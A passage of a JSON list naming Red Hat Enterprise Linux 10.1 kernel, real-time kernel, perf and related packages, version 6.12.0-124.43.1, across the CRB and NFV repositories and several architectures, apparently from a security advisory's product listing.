"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
